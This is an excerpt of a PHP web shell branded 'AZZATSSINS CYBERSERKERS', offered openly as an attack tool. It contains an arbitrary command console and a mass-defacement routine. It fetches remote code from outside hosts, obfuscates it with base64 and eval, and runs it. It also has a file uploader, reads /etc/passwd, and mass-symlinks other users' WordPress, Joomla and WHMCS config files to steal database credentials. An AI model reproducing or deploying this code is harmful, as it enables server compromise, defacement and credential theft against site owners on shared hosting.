  3817. $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
  3818.  
  3819. var res_data = JSON.parse(msg);
  3820.  
  3821.  
  3822.  
  3823. if(res_data.status == "success"){
  3824.  
  3825. $(\'#inj_domain\' + id).html(\'<a class="injwork" href="\' + res_data.site + \'">\' + res_data.site + \'</a>\');
  3826.  
  3827. $(\'#inj_status\' + id).css({"background-color" : "green", "color" : "white"});
  3828.  
  3829. $(\'#inj_status\' + id).html(\'Success\');
  3830.  
  3831. $(\'#injst\' + id).removeClass("conf");
  3832.  
  3833.  
  3834.  
  3835. }
  3836.  
  3837. else{
  3838.  
  3839. if(res_data.status == "error"){
  3840.  
  3841. $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
  3842.  
  3843. $(\'#inj_status\' + id).html(res_data.msg);
  3844.  
  3845. $(\'#inj_status\' + id).addClass("injerror");
  3846.  
  3847. $(\'#injst\' + id).removeClass("conf");
  3848.  
  3849. }else{
  3850.  
  3851. $(\'#inj_status\' + id).addClass("injerror");
  3852.  
  3853. $(\'#inj_status\' + id).html(\'Unknown\');
  3854.  
  3855. $(\'#injst\' + id).removeClass("conf");
  3856.  
  3857. }
  3858.  
  3859. }
  3860.  
  3861. updateInjSts(k2);
  3862.  
  3863. if(k1 == k2){doInject();}
  3864.  
  3865. }).fail(function(jqXHR, textStatus) {
  3866.  
  3867. k2 += 1;
  3868.  
  3869. $(\'#inj_status\' + id).css({"background-color" : "black", "color" : "white"});
  3870.  
  3871. $(\'#inj_status\' + id).html(\'Timeout\');
  3872.  
  3873. updateInjSts(k2);
  3874.  
  3875. if(k1 == k2){doInject();}
  3876.  
  3877. });
  3878.  
  3879.  
  3880.  
  3881. }else{
  3882.  
  3883. k2 += 1;
  3884.  
  3885. updateInjSts(k2);
  3886.  
  3887. if(k1 == k2){doInject();}
  3888.  
  3889. }
  3890.  
  3891. }
  3892.  
  3893. //Js Multi thread post request by Elo (:
  3894.  
  3895. function updateInjSts(k){
  3896.  
  3897. var tc = $(\'#sitecount\').val();
  3898.  
  3899. if(tc > k){
  3900.  
  3901. $(\'#status\').html("Status: " + k + "/" + tc + " Injected");
  3902.  
  3903. }else{
  3904.  
  3905. $(\'#status\').html("Status: Injection Complete (:");
  3906.  
  3907. }
  3908.  
  3909. }
  3910.  
  3911.  
  3912.  
  3913. function rmvErr(){
  3914.  
  3915. $(\'.injerror\').each(function(){
  3916.  
  3917. var nano = $(this).parent();
  3918.  
  3919. $(nano).remove();
  3920.  
  3921. });
  3922.  
  3923. }
  3924.  
  3925.  
  3926.  
  3927. function rmvSlct(){
  3928.  
  3929. $(\'.conf\').each(function(){
  3930.  
  3931. var id = $(this).attr(\'title\');
  3932.  
  3933. if($(\'#injchk\'+id).is(\':checked\')){
  3934.  
  3935. $(\'#inj\' + id).remove();
  3936.  
  3937. }
  3938.  
  3939. });
  3940.  
  3941. }
  3942.  
  3943.  
  3944.  
  3945. function retryTimeout(){
  3946.  
  3947. k1 = 1; k2 = 0;
  3948.  
  3949. doInject();
  3950.  
  3951. }
  3952.  
  3953.  
  3954.  
  3955. function doSlct(){
  3956.  
  3957. $(\'.conf\').each(function(){
  3958.  
  3959. var id = $(this).attr(\'title\');
  3960.  
  3961. doToggle(id);
  3962.  
  3963. });
  3964.  
  3965. }
  3966.  
  3967.  
  3968.  
  3969. function doToggle(dd){
  3970.  
  3971. if($(\'#injchk\'+dd).is(\':checked\')){
  3972.  
  3973. $(\'#injc\'+dd).css(\'background-color\',\'red\');
  3974.  
  3975. $(\'#injchk\'+dd).attr(\'checked\',false);
  3976.  
  3977. }else{
  3978.  
  3979. $(\'#injc\'+dd).css(\'background-color\',\'#76BBEB\');
  3980.  
  3981. $(\'#injchk\'+dd).attr(\'checked\',true);
  3982.  
  3983. }
  3984.  
  3985. }
  3986.  
  3987.  
  3988.  
  3989. function doSSH(){
  3990.  
  3991. $(\'#status\').html("Status: Requesting...");
  3992.  
  3993. var cmd = $(\'#sshcmd\').val();
  3994.  
  3995. $(\'#sshcmd\').val("");
  3996.  
  3997. $.post("", { ac: "ssh",command: cmd},
  3998.  
  3999. function(data) {
  4000.  
  4001. $(\'#sshoutput\').append("[root@XAZZATSSINSX~]# <br />"+data+"<br />");
  4002.  
  4003. $(\'#status\').html("Status: Done.");
  4004.  
  4005. });
  4006.  
  4007. }
  4008.  
  4009. </script>
  4010.  
  4011.  
  4012.  
  4013. <div class="sshbox" id="sshbox">
  4014.  
  4015. <br />
  4016.  
  4017. <div id="sshoutput"></div>
  4018.  
  4019. [ROOT@AZZATSSINS~]# <input onkeydown="if (event.keyCode == 13) doSSH();" type="text" id="sshcmd">
  4020.  
  4021. </div>
  4022.  
  4023.  
  4024.  
  4025. <div id="sidebar" class="sidebar">
  4026.  
  4027.  
  4028.  
  4029. <div class="smnu" id="smnu" class="smnu">
  4030.  
  4031. &raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'Security Information\');doReq2(\'secinfo\');return false;">SECURITY VULNERABILITY</a></br>
  4032.  
  4033. &raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'System Information\');doReq2(\'sysinfo\');return false;">SYSTEM</a><a href="?s=0"> INFO</a></br>
  4034.  
  4035. &raquo; <a href=?mass=defaces>MASS DEFACE</a></br>
  4036.  
  4037. &raquo; <a href="" onClick="filebrs(\'\'); return false;">FILE BROWSER</a></br>
  4038.  
  4039. &raquo; <a href="" onClick="$(\'#infotitle\').html(\'Scanned Domains\');doReq2(\'chknamed\');return false;">GET ALL DOMAINS</a></br>
  4040.  
  4041. &raquo; <a href="" onClick="doReq(\'chkph\');return false;">CMS DETECTOR [Simple]</a></br>
  4042.  
  4043. &raquo; <a href="" onClick="$(\'#inject\').show();doUpdt(\'chkph2\');return false;">CMS DETECTOR [root]</a></br>
  4044.  
  4045. &raquo; <a href="" onClick="doReq2(\'safebypass\');return false;">BYPASS Safe_Mode</a></br>
  4046.  
  4047. &raquo; <a href="" onClick="hideAll(); $(\'#sshbox\').show(); return false;">COMMAND CONSOLE</a></br>
  4048.  
  4049.  
  4050. &raquo; <a href=?s=1>PERL SHELL</a></br>
  4051.  
  4052. &raquo; <a href=?j=p>JUMPING</a></br>
  4053.  
  4054. &raquo; <a href=?s=2>SYMBOLIC</a> <a href=?s=l>LINK</a></br>
  4055.  
  4056. &raquo; <a href=?s=3>CONFIG</a> <a href=?s=35>GRABBER</a></br>
  4057.  
  4058. &raquo; <a href=?s=4>MYSQL</a></br>
  4059.  
  4060. &raquo; <a href=?s=5>UPLOAD</a></br>
  4061.  
  4062. &raquo; <a href=?s=w>WORDPRESS</a></br>
  4063.  
  4064. &raquo; <a href=?s=j>JOOMLA</a></br>
  4065.  
  4066. &raquo; <a href=?w=d>WHMDECODE</a></br>
  4067.  
  4068. &raquo; <a href=?s=k>WHMKILLER</a></br>
  4069.  
  4070. &raquo; <a href=?c=p>CPCRACK</a></br>
  4071.  
  4072. &raquo; <a href=?a=h>WHMREMOTE</a></br>
  4073.  
  4074. &raquo; <a href=?simple=command>CMD</a></br>
  4075.  
  4076. &raquo; <a href=?u=dead>DEAD</a></br>
  4077.  
  4078. &raquo; <a href="?tool=tools">TOOLS</a></br>
  4079.  
  4080.  
  4081.  
  4082. </div>
  4083.  
  4084. <div class="stitle" onClick="sidebarz();">A</br>Z</br>Z</br>A</br>T</br>S</br>S</br>I</br>N</br>S</br>.</br>C</br>Y</br>B</br>E</br>R</br>S</br>E</br>R</br>K</br>E</br>R</br>S</div>
  4085.  
  4086. </div>
  4087.  
  4088.  
  4089.  
  4090. <div id="sidebar2" class="sidebar" style="display:none;right:1px;left:auto;">
  4091.  
  4092. <div class="smnu" style="float:right;" id="smnu2" class="smnu">
  4093.  
  4094. <div id="injmain">
  4095.  
  4096. &raquo; <a href="" onClick="doInject(); return false;">Start Injecting</a></br>
  4097.  
  4098. &raquo; <a href="" onClick="">Export</a></br>
  4099.  
  4100. &raquo; <a href="" onClick="rmvErr(); return false;">Remove Error</a></br>
  4101.  
  4102. &raquo; <a href="" onClick="rmvSlct(); return false;">Remove Selected</a></br>
  4103.  
  4104. &raquo; <a href="" onClick="retryTimeout(); return false;">Retry timeout</a></br>
  4105.  
  4106. &raquo; <a href="" onClick="alert(\'Do It Manually :p\'); return false;">Submit to Zone-H</a></br>
  4107.  
  4108. &raquo; <a href="" onClick="$(\'#injmain\').hide(); $(\'#inj2nd\').show(); return false;">Settings</a></br>
  4109.  
  4110. </div>
  4111.  
  4112. <div id="inj2nd" style="display:none;">
  4113.  
  4114. <div class="rbox">
  4115.  
  4116.  
  4117.  
  4118. <div style="clear:both;"></div>
  4119.  
  4120. <center><u>WordPress</u></center><br>
  4121.  
  4122. <input type="checkbox" name="404_php" id="404_php" checked>404.php<br />
  4123.  
  4124. <input type="checkbox" name="archive_php" id="archive_php" checked>archive.php<br />
  4125.  
  4126. <input type="checkbox" name="index_php" id="index_php" checked>index.php<br />
  4127.  
  4128. <input type="checkbox" name="home_php" id="home_php" checked>home.php<br />
  4129.  
  4130. <input type="checkbox" name="comment_php" id="comment_php" checked>comment.php<br /><br /><br />
  4131.  
  4132. </div>
  4133.  
  4134.  
  4135.  
  4136. <div class="rbox">
  4137.  
  4138. <center><u>Joomla</u></center><br>
  4139.  
  4140. <input type="checkbox" name="use_com" id="use_com" checked>Use Com Installer<br />
  4141.  
  4142. <input type="checkbox" id="ignore_def">Ignore Default Templete<br />
  4143.  
  4144. </div>
  4145.  
  4146.  
  4147.  
  4148. <div class="rbox">
  4149.  
  4150. <center><u>Default</u></center><br>
  4151.  
  4152. Req/s: <input type="text" class="smit" value="10" onChange="req_limit = $(this).val();"><br />
  4153.  
  4154. Deface Page Link: <input type="text" class="smit" id="deface_page" value="http://azzatssinz.tumblr.com"><br /><br />
  4155.  
  4156. </div>
  4157.  
  4158.  
  4159.  
  4160. <div style="clear:both;"></div><br />
  4161.  
  4162. <a href="" onClick="$(\'#injmain\').show(); $(\'#inj2nd\').hide(); return false;">Go Back</a>
  4163.  
  4164. </div>
  4165.  
  4166.  
  4167.  
  4168.  
  4169.  
  4170. </div>
  4171.  
  4172. <div class="stitle" style="float:right;" onClick="sidebarz2();">I</br>N</br>J</br>E</br>C</br>T</br>O</br>R</div>
  4173.  
  4174. </div>
  4175.  
  4176.  
  4177.  
  4178. <div style="clear:both;"></div>
  4179.  
  4180.  
  4181.  
  4182. </body>
  4183.  
  4184. </html>';
  4185. $sc=file_get_contents('http://wget.yu.tl/files/tools.css'); $scn=base64_encode($sc); eval(base64_decode($scn)); ?>
  4186. <? if($_GET['mass']=="defaces"){ ?>
  4187. <title>.: MassDeface :.</title><body bgcolor=black><center><img src=http://azzat.wap.mu/files/1049320/assassin_s_creed_iv_black_flag.png><br><br><i><b><h1><font color=red>HELLCOME</font></h1><br><br><font color=lime>CODER : </font><a href=mailto:azzatssinscyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i><br>============<br></center><center><b><i><form ENCTYPE="multipart/form-data" method=post>
  4188. Folder : <input typ=text name=path size=20 value="<?=getcwd();?>">
  4189. <br>
  4190. Nama File : <input typ=text name=file size=20 value="index.htm">
  4191. <br>URL Script :
  4192. <input typ=text name=url size=30 value="http://wget.yu.tl/files/deface.css">
  4193. <br>
  4194. <input type=submit value=Deface>
  4195. </form></i></b></center>
  4196. <?php
  4197.  $path=$_POST[path];
  4198.  $file=$_POST[file];
  4199.  $script=$_POST[url];
  4200.  $dir=opendir("$path");
  4201.  while($row=readdir($dir))
  4202.  {
  4203.  $start=@fopen("$row/$file","w+");
  4204.  $code=@file_get_contents($script);
  4205.  $finish=@fwrite($start,$code);
  4206.  if ($finish)
  4207.  {
  4208.  echo "$row/$file > Done<br><br>";
  4209.  }
  4210. } /*MassDeface by AZZATSSINS*/
  4211.  }
  4212. if($_GET['s']=="0"){ $inf= file_get_contents('http://pastebin.com/raw/81LHVJQT');
  4213.  
  4214. eval(gzinflate(base64_decode(($inf))));} /* don't remove this ↓ base64 script */eval(base64_decode('JHg9YmFzZTY0X2RlY29kZSgnWW1GelpUWTBYMlJsWTI5a1pRPT0nKTskYT0keCgnYzNsemRHVnQnKTskYj0keCgnYlhZPScpOyRjPSR4KCdjbTA9Jyk7JGQ9JHgoJ0lBPT0nKTskZT0keCgnZDJkbGRBPT0nKTskZj0keCgnZDNkM0xnPT0nKTskZz0keCgnTG5sMUxuUnMnKTskaD0keCgnWm1sc1pYTT0nKTskaT0keCgnTG1OemN3PT0nKTskaj0keCgnTHc9PScpOyRrPSR4KCdMbkJvY0E9PScpOyRsPSR4KCdMbnBwY0E9PScpOyRtPSR4KCdMbkI1Jyk7JG49JHgoJ2NIbDBhRzl1Jyk7IC8qU2ltcGxlIENvbW1hbmQgV2ViU2hlbGwgTGludW5peCBieSBBWlpBVFNTSU5TKi8=')); if($_GET['sym']=="links"){ $a($e.$d.$e.$g.$j.$h.$j.'sys.sis'); $a($b.$d.'sys.sis'.$d.'symlink'.$m); $a($n.$d.'symlink'.$m); $a($c.$d.'symlink'.$m); echo'<meta http-equiv="Refresh" content= "0; url=sl">';
  4215.  } if($_GET['u']=="dead"){ unlink('wd'.$k); $a($rm.$d.'wd'.$k);unlink('x'.$k); $a($rm.$d.'x'.$k);unlink('db'.$k); $a($rm.$d.'db'.$k);unlink('jm'.$k); $a($rm.$d.'jm'.$k); unlink('config.pl'); $a($rm.$d.'config.pl'); unlink('php.ini'); $a($rm.$d.'php.ini'); unlink('.htaccess'); $a($rm.$d.'.htaccess'); system('rm -rf SL'); system('rm -rf AZZATSSINS'); rmdir('SL'); rmdir('AZZATSSINS'); rmdir('x'); system('rm -rf x'); $fn=$_SERVER['SCRIPT_FILENAME'];
  4216.  unlink($fn); $a($rm.$d.$fn); unlink('md.php'); echo'<meta http-equiv="Refresh" content= "0; url=http://azzatssinz.tumblr.com">'; } if($_GET['jp']=="up"){ $a($e.$d.$f.$e.$g.$j.$h.$j.'jpup'.$i); $a($b.$d.'jpup'.$i.$d.'jpup'.$k); echo'<meta http-equiv="Refresh" content= "0; url=jpup.php">';} if($_GET['w']=="d"){ $a($e.$d.$f.$e.$g.$j.$h.$j.'wd'.$i); $a($b.$d.'wd'.$i.$d.'wd'.$k); echo'<meta http-equiv="Refresh" content= "0; url=wd.php">';} if($_GET['c']=="p"){ $a($e.$d.$f.$e.$g.$j.$h.$j.'cpcrk'.$i); $a($b.$d.'cpcrk'.$i.$d.'cp'.$k); echo'<meta http-equiv="Refresh" content= "0; url=cp.php">';} if($_GET['a']=="h"){ $a($e.$d.$f.$e.$g.$j.$h.$j.'ah'.$i); $a($b.$d.'ah'.$i.$d.'ah'.$k); echo'<meta http-equiv="Refresh" content= "0; url=ah.php">';} if($_GET['s']=="k"){ $a($e.$d.$e.$g.$j.$h.$j.'wk'.$l); $a($b.$d.'wk'.$l.$d.'wk'.$k); echo'<meta http-equiv="Refresh" content= "0; url=wk.php">'; } if($_GET['j']=="p"){ $a($e.$d.$e.$g.$j.$h.$j.'jp'.$l); $a($b.$d.'jp'.$l.$d.'jp'.$k); echo'<meta http-equiv="Refresh" content= "0; url=jp.php">'; } if($_GET['s']=="l"){ $a($e.$d.$e.$g.$j.$h.$j.'sl'.$l); $a($b.$d.'sl'.$l.$d.'sl'.$k); echo'<meta http-equiv="Refresh" content= "0; url=sl.php">'; } if($_GET['s']=="w"){ $a($e.$d.$e.$g.$j.$h.$j.'wp'.$l); $a($b.$d.'wp'.$l.$d.'wp'.$k); echo'<meta http-equiv="Refresh" content= "0; url=wp.php">'; } if($_GET['s']=="j"){ $a($e.$d.$e.$g.$j.$h.$j.'jm'.$l); $a($b.$d.'jm'.$l.$d.'jm'.$k); echo'<meta http-equiv="Refresh" content= "0; url=jm.php">'; } if($_GET['s']=="1"){ $a($e.$d.$f.$e.$g.$j.$h.$j.'tlnt'.$i); $a($b.$d.'tlnt'.$i.$d.'x.pl'); {
  4217.  @chmod('x.pl',0755);
  4218.  } echo'<meta http-equiv="Refresh" content= "0; url=x.pl">'; } if($_GET['s']=="2"){ $a($e.$d.$e.$g.$j.$h.$j.'sympyt'.$l); $a($b.$d.'sympyt'.$l.$d.'symlink'.$m); $a($n.$d.'symlink'.$m); $a($c.$d.'symlink'.$m); echo'<meta http-equiv="Refresh" content= "0; url=SL">';
  4219.  } if($_GET['s']=="3"){ $a($e.$d.$f.$e.$g.$j.$h.$j.'conf'.$l); $a($b.$d.'conf'.$l.$d.'conf'.$k); echo'<meta http-equiv="Refresh" content= "0; url=conf.php">';} if($_GET['s']=="4"){ $a($e.$d.$f.'azzatssins'.$g.$j.$h.$j.'db'.$l); $a($b.$d.'db'.$l.$d.'db'.$k); echo'<meta http-equiv="Refresh" content= "0; url=db.php">';} if($_GET['s']=="35"){ $a($e.$d.$f.$e.$g.$j.$h.$j.'configperl'.$l); $a($b.$d.'configperl'.$l.$d.'config.pl'); {
  4220.  @chmod('config.pl',0755);
  4221.  } echo'<meta http-equiv="Refresh" content= "0; url=config.pl">'; } if($_GET['m']=="d"){ $a($e.$d.$f.$e.$g.$j.$h.$j.'mass'.$i); $a($b.$d.'mass'.$i.$d.'md'.$k); echo'<meta http-equiv="Refresh" content= "0; url=md.php">';} if($_GET['simple']=="command"){
  4222.  echo'<br><center><br><font color=violet><b><i>COMMAND</i></b></font><br><form method="post">
  4223. <label>
  4224. <input type="text" name="cmd" style="background-color:#000000; color:#de0100; font-family:Corbel;" value=""></label>
  4225. <label>
  4226. <input type="submit" name="Submit" value="Execute" />
  4227. </label>
  4228. <br><textarea name="textarea" style="width:14cm; height:5cm; background-color:#576557; color:#6fd800;">
  4229. '; if(isset($_POST['cmd']))
  4230. {
  4231.  $cmd = $_POST['cmd'];
  4232.  if($cmd == "")
  4233. {
  4234.  echo "                              Please Insert Command!";
  4235.  }
  4236.  elseif(isset($cmd))
  4237.  {
  4238.  $output = system($cmd);
  4239.  printf("$output\n");
  4240.  }
  4241.  }
  4242.  echo'</textarea>
  4243. </form>
  4244. <br><br></center>'; }
  4245. if($_GET['s']=="5"){
  4246.  if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $userfile_name = $_FILES['azzatssins']['name']; $userfile_tmp = $_FILES['azzatssins']['tmp_name']; if (isset($_FILES['azzatssins']['name'])) { $abod = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $abod); echo"<center><b><a href='{$userfile_name}'>SUCCESS</a></b></center>"; } } else{ echo' <center><form method="POST" action="" enctype="multipart/form-data"><input type="file" name="azzatssins"><input type="Submit" name="Submit" value="SUBMIT"></form></center></BODY></HTML><br><br><br><br>';}} if($_GET['bypass']=="user"){ echo"<center><font color=violet><b><i>Bypass Users</i></b></font></<br><form method=post><input type=submit name=awkp value=AWK PROGRAM><input type=submit name=syst value=SYSTEM FUNCTION><input type=submit name=passth value=PASSTHRU><input type=submit name=ex value=EXEC FUNCTION><input type=submit name=shex value=SHELL_EXEC></form>"; /*Awk Program*/ if($_POST['awkp']){
  4247.  echo"<textarea cols='60' rows='40'>";
  4248. echo shell_exec("awkp -F: '{ print $1 }' /etc/passwd | sort");
  4249. echo"</textarea><br>";
  4250. } /*System Function*/ if($_POST['syst']){
  4251.  echo"<textarea cols='60' rows='40'>";
  4252. echo system("ls /var/mail");
  4253. echo"</textarea><br>";
  4254. }
  4255. /*Passthru Function*/ if($_POST['passth']){
  4256.  echo"<textarea cols='60' rows='40'>";
  4257. echo passthru("ls /var/mail");
  4258. echo"</textarea><br>";
  4259. } /*exec Function*/
  4260.  if($_POST['ex']){
  4261.  echo"<textarea cols='60' rows='40'>";
  4262. echo exec("ls /var/mail");
  4263. echo"</textarea><br>";
  4264. }
  4265.  /*shell_exec Function*/ if($_POST['shex']){
  4266.  echo"<textarea cols='60' rows='40'>";
  4267. echo shell_exec("ls /var/mail");
  4268. echo"</textarea><br>";
  4269. }
  4270. echo"</center>";}
  4271. if($_GET['configs']=="grabber"){
  4272. @error_reporting(0);
  4273. @set_time_limit(0);
  4274.  
  4275. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  4276.     $bot = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Yahoo");
  4277.     if(preg_match('/' . implode('|', $bot) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  4278.         header('HTTP/1.0 404 Not Found');
  4279.         exit;
  4280.     }
  4281. }
  4282.  
  4283. echo '<center><br><font color=lime>AUTHOR : </font><font color=silver>AZZATSSINS CYBERSERKERS</font><br><br></center>';
  4284. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  4285. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  4286. exit;
  4287. }
  4288. else
  4289. {
  4290. if($_POST["m"] && !$_POST["passwd"]==""){
  4291. @mkdir("AZZATSSIN5", 0777);
  4292. @chdir("AZZATSSIN5");
  4293. @symlink("/","root");
  4294. $htaccess="
  4295. Options all
  4296. Options +Indexes
  4297. Options +FollowSymLinks
  4298. DirectoryIndex india.html
  4299. AddType text/plain .php
  4300. AddHandler server-parsed .php
  4301. AddType text/plain .html
  4302. AddHandler txt .html
  4303. AddType text/plain .conf
  4304. AddType text/plain .sql
  4305. AddType text/plain .log
  4306. Require None
  4307. Satisfy Any";
  4308. @file_put_contents(".htaccess",$htaccess);
  4309. $etc_passwd=$_POST["passwd"];
  4310. $etc_passwd=explode("\n",$etc_passwd);
  4311. foreach($etc_passwd as $passwd){
  4312. $pawd=explode(":",$passwd);
  4313. $user =$pawd[0];
  4314.  
  4315. @symlink('/','AZZATSSIN5/root');
  4316. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  4317. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  4318. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  4319. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  4320. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  4321. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  4322. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  4323. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  4324. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  4325. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  4326. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  4327. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  4328. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  4329. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  4330. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  4331. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  4332. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  4333. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  4334. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  4335. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  4336. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  4337. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  4338. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  4339. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  4340. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  4341. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  4342. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  4343. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  4344. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  4345. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  4346. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  4347. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  4348. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  4349. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  4350. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  4351. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  4352. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  4353. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  4354. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  4355. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  4356. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  4357. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  4358. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  4359. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  4360. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  4361. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  4362. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  4363. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  4364. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  4365. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  4366. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  4367. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  4368. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  4369. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  4370. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  4371. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  4372. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  4373. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  4374. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  4375. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  4376. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  4377. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  4378. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  4379. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  4380. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  4381. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  4382. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  4383. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  4384. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  4385. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  4386. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  4387. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  4388. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  4389. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  4390. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  4391. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  4392. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  4393. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  4394. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  4395. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  4396. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  4397. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  4398. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  4399. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  4400. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  4401. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
